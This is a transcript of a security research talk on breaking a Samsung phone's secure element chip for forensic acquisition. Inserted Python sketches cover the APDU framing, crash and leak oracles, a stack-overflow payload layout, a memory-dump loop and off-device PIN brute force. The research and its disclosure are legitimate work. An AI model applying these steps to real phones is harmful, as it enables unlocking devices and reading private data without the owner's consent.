Hello, and welcome to Chip Chop: Smashing the Mobile Phone Security Chip for Fun and Digital Forensics. My name is Gunnar Alendal and I am a PhD candidate at NTNU in Norway, and I am going to talk about one of the bigger bottlenecks in digital forensics these days. Namely, the digital forensic acquisition phase, which is getting data from a seized device, for example.

So our research looked into modern smartphone devices and how hard it is to access user data on such devices without the user credentials. We will only focus on the digital forensic acquisition phase, which starts after you have seized the device and ends when you have extracted the data, so that we have plaintext data for the analysis and reporting phases of digital forensics.

And just a few years back, this was not a challenge at all because security was not a big issue. It was just a matter of gaining access to the data: you could, sort of, desolder the flash and just read out the content, and then do the analysis and reporting fairly straightforwardly.

But in recent years, this has of course changed a lot because now our lives are mostly on smart devices. And of course the security level had to increase as well because of this. This mandatory security is now on all modern smartphones, and users cannot even choose to disable it. So you do have a secure mobile device when you purchase it from the store, and you usually don’t have to enable anything. This is of course very good for user security, but it is a huge challenge for digital forensic acquisition, because now we need to either get hold of the user credentials or bypass the security mechanisms protecting the sensitive user data.



So we looked into a modern smartphone from Samsung which runs Android. So we looked into what actually prevents us from doing digital forensic acquisition of such a device. And there are all kinds of security mechanisms on such a smart device and the most prevalent one protecting user data is of course the Android file-based encryption, which protects the user data if you don’t have the key material for decrypting it.

And we looked into paths to go and attack this model to see if we can extract data from devices without the knowledge of user credentials. And we figured out one such example path for doing digital forensic acquisition of the device is divided into two phases:

It’s first breaking the rich execution environment, which is where most of the code, Android operating system and apps live on an Android device. And then we needed to break a secure element chip, which was introduced recently on these phones because this secure element chip protects the encryption layer and the sensitive key material that protects the file-based encryption for sensitive user data.



So, we need to look into the different phases of file-based encryption before we can attack the model. And we often talk about different states when we talk about file-based encryption, and file-based encryption basically has two storage types; it has the Device Encrypted (DE) storage, and it has the Credential Encrypted (CE) storage. And of course, a device powered off will have no such key material available. And if you desolder the storage flash, it will just have encrypted material.

But if you power on such a device without entering user credentials, you will be in a before-first-unlock state, a BFU state. That means that the device-encrypted storage will be available because this is hardware-protected key material. And if the hardware is happy with the boot, so it’s considered a secure boot, then this key material will be available so you can read out Device Encrypted files.

But the Credential Encrypted files, where most of the user data is stored, are protected by this new secure element chip. And you need to get key material from that chip to be able to take the device from BFU to the after-first-unlock, or AFU, state to be able to access Credential Encrypted (CE) files.

So we needed to attack this model in some way, and we only focused on the second phase. The first phase is basically gaining root on such a device, or breaking the rich execution environment, which enables you to read out Device Encrypted files. Attacks on secure boot and the rich execution environment have been done before, and numerous examples of vulnerabilities here exist. So we only looked at the second phase, on this new secure element chip, which was introduced on modern phones.

So we need to first attack the rich execution environment to gain root, which we assume we already had. And then look, if we can attack the secure element chip, which takes the device from BFU to AFU state. So without having the credentials, can we attack this to take the device from BFU to AFU state to do digital forensics of Credential Encrypted storage?



To understand why we need to attack this secure element chip, we need to understand this state transition from BFU to AFU state. So if a user enters their PIN, password or pattern on the screen, this will go into a key derivation function together with the SALT, and this will eventually produce a challenge. This challenge is sent for verification to the secure element chip. If the challenge is correct and matches the correct user credentials, then the secure element will return a corresponding secret. Together these three parameters are all that is needed to take the device from BFU to AFU state. So if you have the screen lock, the SALT and this secret, you can take the device from BFU to AFU state.
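The verification step described here can be pictured with a small toy model. This is only a sketch under assumptions: the class name, the method names and the hard failure limit are hypothetical, and the real chip's brute force protection is not described in the talk.

```python
import hmac
from typing import Optional


class ToySecureElement:
    """Toy model of one challenge/secret slot; not the real chip firmware."""

    def __init__(self, max_failures: int = 5) -> None:
        self._challenge = b""
        self._secret = b""
        self._failures = 0
        self._max_failures = max_failures  # hypothetical limit

    def write(self, challenge: bytes, secret: bytes) -> None:
        # Called when the user sets or changes the screen lock.
        self._challenge, self._secret = challenge, secret
        self._failures = 0

    def read(self, challenge: bytes) -> Optional[bytes]:
        # Refuse further attempts once the failure budget is used up.
        if self._failures >= self._max_failures:
            return None
        # Constant-time comparison of the submitted and stored challenge.
        if hmac.compare_digest(challenge, self._challenge):
            self._failures = 0
            return self._secret
        self._failures += 1
        return None
```

The point of the model is that the secret only leaves the chip when the right challenge comes in, and that guessing on the device is limited by the chip itself.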

But how do we attack this model? Well, first let’s summarize it. You can see that these three are all that is needed, but to attack this model, we don’t actually focus on the secret, because we can focus on the challenge that is produced from the KDF and eventually the passwordTokenToWeaverKey function, because it only has two uncertain parameters; that is the screen lock and the SALT. So if we can get hold of the challenge and we can get hold of the SALT, we can brute force the user credentials.

So getting hold of the SALT, we can assume that we can do this, since we assume that we have already passed phase one and have an exploit for the rich execution environment. So we can have the SALT, which is stored in a file that is DE encrypted. So we only need to break into the secure element chip and sort of ‘steal’ the challenge. If we can take that challenge together with the SALT, we can do off-device brute force. So you can see here, the arrows in green, if we get the SALT and the challenge then brute force is fairly straightforward.



So our attack looked at doing exactly this. So sort of to summarize, we first break the rich execution environment, which is similar to what we call getting root. There are two reasons for this: the first reason is to get hold of the SALT, of course, but also to be able to spawn a system-privileged process that can actually talk to the secure element.

So if we can assume we can do that, we can attack the secure element through its logical interface. So then we can attack the secure element chip and we can get hold of the challenge and the secret, and mostly the challenge is what we need to do brute force. So then we can do off-device brute force of this screen lock credential.

So this sounds simple enough. So how do we attack this secure element chip? Just a few details on this secure element chip. It was introduced in Galaxy S20 models in 2020, mostly on the Exynos devices, and it is a black box chip, so it’s a standalone. It’s running an ARM processor and it has onboard flash and RAM to store both code and sensitive data. So this chip only has 258 kilobytes of onboard flash for storing both code and sensitive data, and it has 16 kilobytes of random-access memory. And it’s also CC EAL 5+ certified.

So some effort has been put into securing this design, so that the chip itself is protected and can secure this sensitive key material. And of course it’s designed to protect against other attacks like hardware attacks and side-channel attacks, and the design principle is that it should protect this key material and other features that it has against a completely compromised system.

So even with a fully compromised rich execution environment, like we assume in phase one, it should protect the key material. So it should not trust the rich execution environment. And of course, to be able to do that, it has its own brute force protection to protect against the rich execution environment bombarding it with challenge attempts. So this feature, that this external secure element chip protects this key material, is what Android refers to as “Weaver” support in their code.

So since this is a “black box”, how do we attack it? Well, we can sort of investigate and look at the processes talking to this secure element device. So you can reverse engineer this hermesd process, which talks to the secure element chip. We can replace this with our own chip_breaker tool to make it easier to develop code. Since we have root on the device, we can put in our own code and our own process. So it communicates using APDUs, and this is fairly normal for SIM cards.

So you can see the secure element chip as sort of a SIM card, just soldered onto the PCB. But we don’t know anything about what is running on the secure element chip. So if we can observe and implement the rich execution environment side of the communication, we can send commands and data to the secure element.
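For readers unfamiliar with APDUs, a short command in the ISO/IEC 7816-4 style is a four-byte header (CLA, INS, P1, P2), an optional one-byte length with data, and an optional expected response length; a response ends with a two-byte status word. The sketch below only illustrates that framing. The function names and the class and instruction bytes in the usage note are hypothetical, not the ones the chip uses.

```python
from typing import Optional, Tuple


def build_apdu(cla: int, ins: int, p1: int, p2: int,
               data: bytes = b"", le: Optional[int] = None) -> bytes:
    """Build a short command APDU: header, optional Lc + data, optional Le."""
    if len(data) > 255:
        raise ValueError("short APDU data field is limited to 255 bytes")
    apdu = bytes([cla, ins, p1, p2])
    if data:
        apdu += bytes([len(data)]) + data  # Lc is a single byte
    if le is not None:
        apdu += bytes([le & 0xFF])         # Le of 0 conventionally means 256
    return apdu


def parse_response(resp: bytes) -> Tuple[bytes, int]:
    """Split a response APDU into its data and the 16-bit status word."""
    if len(resp) < 2:
        raise ValueError("response APDU must end with SW1 SW2")
    return resp[:-2], int.from_bytes(resp[-2:], "big")
```

For example, `build_apdu(0x80, 0x01, 0, 0, b"\xaa\xbb", le=0)` yields the bytes `80 01 00 00 02 aa bb 00`, and a status word of `0x9000` is the usual "success" value.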

So we can talk to the APDU handlers on the secure element, but we cannot get any useful feedback. And this is a deal breaker if you’re going to attack something, because you need some information leaking back: you don’t get any logs from the secure element, you don’t get any debug output, you don’t get any crash reports, you get no information back. So this is what we mean by an Oracle. We need some information leak Oracles to be able to attack this.

We identified two such Oracles, and the first Oracle is somewhat standard and easy. It’s just looking at the APDU standard. It says that anyone communicating with APDUs must give a response back. So this means that the secure element chip must give you a response back even if you send some wrong commands or wrong data. So no response means that probably something crashed. So that’s a good response. No response is a good response. We don’t know exactly what happens when we don’t get a response or the protocol times out, but probably it’s a sign that something went wrong, which is a good sign from an attacker’s point of view.
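Oracle 1 boils down to treating silence as a signal. A minimal sketch, assuming a hypothetical transport function that returns `None` when the chip does not answer in time; `fake_chip` is an invented stand-in so the example can run without hardware.

```python
from typing import Callable, Optional

# Hypothetical transport: sends one APDU, returns the response or None on timeout.
Transport = Callable[[bytes], Optional[bytes]]


def oracle1_crashed(send: Transport, apdu: bytes) -> bool:
    """True when the chip stayed silent, which hints that something crashed."""
    return send(apdu) is None


def fake_chip(apdu: bytes) -> Optional[bytes]:
    # Stand-in for real hardware: "crashes" when the Lc byte exceeds 64.
    lc = apdu[4] if len(apdu) > 4 else 0
    return None if lc > 64 else b"\x90\x00"
```

With this, sending inputs of growing size and watching where `oracle1_crashed` flips from `False` to `True` is one way to narrow down which inputs the chip does not handle.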



Oracle 2 is a bit harder to locate, but if you look for Oracles and APDU handlers that work in “pairs”, like they work on the same type of data, like any put or get, or any send and receive type of functions, then you can be lucky to find such an Oracle that will leak more data back from the secure element than it was supposed to.

And we found one such Oracle by combining the APDU_writeWeaver and the APDU_readWeaver functions, which are handlers running on the secure element chip. These are just my names for these, but these are running on the secure element chip and they work on the same type of data. APDU_writeWeaver is used when you set a new screen lock or change your screen lock on the mobile device. Then of course a new challenge and secret are generated and sent to the secure element chip for storage.

So when you try to verify your screen lock, this challenge is verified using APDU_readWeaver. Any attempt you make on the screen lock will end up in a challenge, and this challenge will be sent to the secure element chip and verified against the challenge set by APDU_writeWeaver, and then you get the secret back.

So can we abuse these to get an Oracle? And we could, because we can manipulate the challenge and secret sizes to get hold of more information leaking back than we were actually supposed to. So we can use APDU_writeWeaver to set manipulated sizes for the challenge and secret. And we could then read back more data from the device than we’re supposed to using APDU_readWeaver.

So these two combined give the second Oracle. This is just an example of a leak from this Oracle 2. And you can see that it leaks some data back when we are using APDU_readWeaver with a larger size for the secret. So we can get the 32 bytes of secret, which is the normal size of this secret, but also much more data. And this is a stack leak, it turns out, and a stack leak is very valuable when mounting an attack on this device. So, these two Oracles can be used to investigate this secure element black box chip, and we could also use them to discover a vulnerability in this secure element.
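The idea behind Oracle 2 can be shown with a toy model of a write/read handler pair where the write side stores a caller-supplied size without validating it. Everything here is an illustration under assumptions: the class, the memory layout and the placeholder "stack" bytes are invented, and the real handlers are only known from the description above.

```python
class ToyWeaverSlot:
    """Toy handler pair that trusts a caller-supplied secret size."""

    NEIGHBOUR = b"STACK-DATA-NOT-MEANT-TO-LEAK"  # placeholder for adjacent memory

    def __init__(self) -> None:
        # A 32-byte secret buffer followed by unrelated bytes.
        self._mem = bytearray(32) + bytearray(self.NEIGHBOUR)
        self._secret_len = 32

    def write(self, secret: bytes, claimed_len: int) -> None:
        # Only 32 bytes are stored, but the claimed size is kept unchecked.
        self._mem[:32] = secret[:32].ljust(32, b"\x00")
        self._secret_len = claimed_len

    def read(self) -> bytes:
        # The read side returns as many bytes as the write side recorded.
        return bytes(self._mem[: self._secret_len])
```

Writing with `claimed_len=32` returns only the secret; writing with `claimed_len=48` returns the secret plus 16 bytes of whatever sits next to it, which is the kind of over-read the talk describes as a stack leak.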



So, long story short, we could trigger a buffer overflow in the APDU_writeWeaver handler by just sending in a large secret. So instead of sending in a 32-byte challenge and a 32-byte secret, we could send in a large secret with, for example, 255 bytes. The maximum is 255 since the length is a single byte. And this triggered Oracle 1, which meant that probably something crashed.

So with this buffer overflow triggered, we had an excellent indication of something going wrong, and we could manipulate the stack in APDU_writeWeaver in some way to be able to exploit this device. And again, skipping some of the details, which are in the paper, you can see that by manipulating the input to APDU_writeWeaver we have a complete buffer overflow. It allows us to control the secret of 32 bytes, as you can see, then the stored registers and then the stored program counter. And if we can control the program counter, we can control the execution on this secure element chip.
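The layout described here (32 bytes of secret, then stored registers, then the stored program counter) can be written down as a byte string. This is a sketch under assumptions: 32-bit little-endian values are assumed because the chip runs an ARM processor, and the number of stored registers and all values are hypothetical; the real layout is in the paper.

```python
import struct
from typing import List


def build_overflow_payload(secret: bytes, saved_regs: List[int], new_pc: int) -> bytes:
    """Lay out: 32-byte secret | stored registers | stored program counter."""
    if len(secret) != 32:
        raise ValueError("the secret field is 32 bytes")
    payload = secret
    for reg in saved_regs:
        payload += struct.pack("<I", reg)   # assumed 32-bit little-endian
    payload += struct.pack("<I", new_pc)
    if len(payload) > 255:
        raise ValueError("a single length byte allows at most 255 bytes")
    return payload
```

The 255-byte check mirrors the single-byte length limit mentioned earlier; the register count passed in is a placeholder for whatever the target function actually saves on its stack.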

So using this, we could develop a full exploit for this secure element chip from the rich execution environment. So we could send in a manipulated challenge and secret, control the stack and then control execution. And then we could use this to return to a ROP gadget we located, with which we were able to dump 16 bytes of arbitrary data from any address. So this means we could dump the full flash and the full random-access memory. Dumping the flash is of course what we were going for as a goal, because then we could dump the secure storage. And that is dumping the challenge and the secret, which we assume we don’t know as an attacker.
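Once a primitive returns 16 bytes from any address, dumping a whole region is a loop over that primitive. A minimal sketch, where `read16` is a hypothetical callable standing in for one round trip through the exploit:

```python
from typing import Callable


def dump_region(read16: Callable[[int], bytes], start: int, length: int) -> bytes:
    """Dump `length` bytes from `start` using a 16-bytes-per-call read primitive."""
    out = bytearray()
    for addr in range(start, start + length, 16):
        chunk = read16(addr)
        if len(chunk) != 16:
            raise RuntimeError(f"short read at address {addr:#x}")
        out += chunk
    return bytes(out[:length])  # trim the last chunk if length is not a multiple of 16
```

Each call to `read16` would correspond to one exploit run on the device, so the total number of runs is the region size divided by 16, rounded up.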

So, with the SALT, which we assume we already had, and this challenge, which we could exploit the secure element to give up and then read out, we have all we need to do an off-device brute force. So this code is basically all that is needed for a proof of concept Python script: if you have the SALT and the stolen challenge, they’re in green, then you can brute force, in this case, a PIN fairly straightforwardly and recover any PIN off device with no problem.
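The following is not the script from the talk, only a minimal sketch of the same idea. It assumes scrypt as the key derivation function and uses a personalised SHA-512, truncated to 32 bytes, as a stand-in for passwordTokenToWeaverKey; the parameter defaults and the personalisation string are assumptions, and on a real device the KDF parameters would be read from the same file as the SALT.

```python
import hashlib
from itertools import product
from typing import Optional


def derive_challenge(pin: str, salt: bytes, n: int = 2**11, r: int = 8, p: int = 1) -> bytes:
    """Derive a 32-byte challenge from a PIN and SALT (assumed KDF chain)."""
    token = hashlib.scrypt(pin.encode(), salt=salt, n=n, r=r, p=p, dklen=32)
    # Stand-in for passwordTokenToWeaverKey: personalised hash of the token.
    return hashlib.sha512(b"weaver-key".ljust(128, b"\x00") + token).digest()[:32]


def brute_force_pin(stolen: bytes, salt: bytes, min_len: int = 4,
                    max_len: int = 6, **kdf: int) -> Optional[str]:
    """Try every numeric PIN of the given lengths against the stolen challenge."""
    for length in range(min_len, max_len + 1):
        for digits in product("0123456789", repeat=length):
            pin = "".join(digits)
            if derive_challenge(pin, salt, **kdf) == stolen:
                return pin
    return None
```

Because the comparison happens off device, the chip's own brute force protection never sees these attempts; the only cost per guess is one KDF evaluation.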

And we shall see a demonstration of this. It’s just a simple Python script running on the CPU. So it’s not optimized at all. It can be optimized on hardware. You can see that the secure element challenge and the SALT are the only inputs we need. The KDF parameter is stored in the same file as the SALT. And you can see that it recovers the correct PIN in just one minute and 30 seconds. And this is all that is needed to recover the screen lock. So with this, we can take the device from BFU to AFU state and see the Credential Encrypted storage.



So to conclude our research into this mobile device: it is possible, just using a zero-day that we located and exploited, to take the device from BFU to AFU state. And combining this with an exploit in the rich execution environment, that’s basically all we need to be able to do a full digital forensic acquisition of the device.

And this secure element chip: S3K250AF in this Samsung Galaxy model, it is CC EAL certified, but that shouldn’t discourage us from looking for vulnerabilities to do digital forensic acquisition, because this was broken by a single buffer overflow which was located by a single researcher. And so this is both encouraging and discouraging depending on which hat you put on.

But also, our attack was on the logical APDU interface, which means that if your rich execution environment exploit is remotely exploitable, then this attack can also be done remotely. So you don’t need physical access to the secure element chip. And also, since we have access to both read and write the flash, the question is whether we can trust these devices after such a vulnerability has been discovered, because we can also write persistent changes to the device.

And also, our future work is trying to look into removing this rich execution environment requirement, because now we require two exploits: one in the rich execution environment, and one in the secure element, and we are looking into whether we can remove this first rich execution environment exploitation requirement. And also I’m looking into, since I can do firmware modifications on the device, can I make them undetectable or hard to remove? So if a device like this, the secure element chip, had a serious vulnerability like this, can I install firmware modifications that can actually survive a firmware update from Samsung?

And this is a summary of our work. Please read the full paper for all the details, and thank you for listening. And I will also thank my supervisors Geir Olav and Stefan. And of course, thanks to Samsung for their very professional handling of this issue once I reported it and for their great cooperation. So thank you all. And thank you for listening.